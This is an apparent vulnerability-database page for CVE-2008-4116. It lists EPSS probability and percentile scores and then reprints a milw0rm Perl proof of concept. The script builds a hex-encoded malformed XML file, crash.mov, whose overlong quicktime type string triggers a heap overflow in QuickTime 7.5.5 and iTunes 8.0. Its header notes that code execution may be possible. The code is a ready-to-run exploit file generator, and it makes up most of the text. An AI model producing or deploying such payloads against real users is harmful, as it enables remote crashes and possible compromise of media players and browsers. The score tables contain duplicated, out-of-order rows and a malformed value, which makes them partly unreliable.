CVE-2008-4116 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	8.9%	–	–
2022-04-03	–	–	8.9%	–	–
2022-05-15	–	–	8.9%	–	–
2023-03-12	–	–	–	6.49%	–
2024-01-21	–	–	–	7.76%	–
2024-02-25	–	–	–	6.54%	–
2024-06-02	–	–	–	6.81%	–
2024-06-09	–	–	–	8.65%	–
2024-12-22	–	–	–	8.65%	–
2025-01-05	–	–	–	8.65%	–
2025-02-23	–	–	–	8.94%	–
2025-01-19	–	–	–	8.65%	–
2025-02-23	–	–	–	8.94%	–
2025-03-18	–	–	–	–	8.14%
2025-03-30	–	–	–	–	11.9%
2025-04-06	–	–	–	–	9.68%
2025-04-06	–	–	–	–	9.68,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	83%
2022-04-03	93%
2022-05-15	94%
2023-03-12	93%
2024-01-21	94%
2024-02-25	94%
2024-06-02	94%
2024-06-09	95%
2024-12-22	94%
2025-01-05	95%
2025-02-23	95%
2025-01-19	95%
2025-02-23	95%
2025-03-18	92%
2025-03-30	93%
2025-04-06	92%
2025-04-06	92%

############################################################################### # Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash # Vendor: http://www.apple.com/ # Risk : high # # The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player. # This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding # to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a # remote crash on firefox, IE and any browser using the Quicktime plugin. # Code execution may be possible. my $payload = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x3f". "\x3e\x0d\x0a\x3c\x3f\x71\x75\x69\x63\x6b\x74\x69\x6d\x65\x20\x74\x79\x70\x65\x3d". "\x22\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x71\x75\x69\x63\x6b". "\x74\x69\x6d\x65\x2d\x6d\x65\x64\x69\x61\x2d\x6c\x69\x6e\x6b\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20". "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3f\x3e". "\x0d\x0a\x3c\x65\x6d\x62\x65\x64\x20\x73\x72\x63\x3d\x22\x72\x74\x73\x70\x3a\x2f". "\x2f\x6e\x6f\x73\x69\x74\x65\x2e\x63\x6f\x6d\x2f\x6e\x6f\x76\x69\x64\x7a\x2e\x6d". "\x6f\x76\x22\x20\x61\x75\x74\x6f\x70\x6c\x61\x79\x3d\x22\x77\x68\x61\x74\x65\x76". "\x65\x72\x22\x20\x2f\x3e\x00"; my $file="crash.mov"; open(my $file, ">>$file") or die "Cannot open $file: $!"; print $file $payload; close($file); # milw0rm.com [2008-09-16]